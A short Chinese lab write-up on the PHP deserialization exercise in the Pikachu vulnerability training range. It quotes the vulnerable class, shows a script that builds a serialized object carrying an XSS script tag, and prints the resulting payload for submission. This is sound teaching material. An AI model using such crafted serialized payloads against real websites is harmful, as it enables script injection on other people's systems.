0
点赞
收藏
分享

微信扫一扫

Pikachu漏洞靶场 PHP反序列化

PHP反序列化

查看源码,以下为关键代码:

class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}

首先是一个PHP类,里面有一个变量test;还有构造函数__construct(),它输出本实例的test变量值。

构造payload

<?php
class S{
    var $test = "<script>alert('xss')</script>";
}
$c = new S();
echo(serialize($c));
?>

运行:

得到payload:

O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

在网站提交准备好的payload,反序列化成功利用:

举报

相关推荐

0 条评论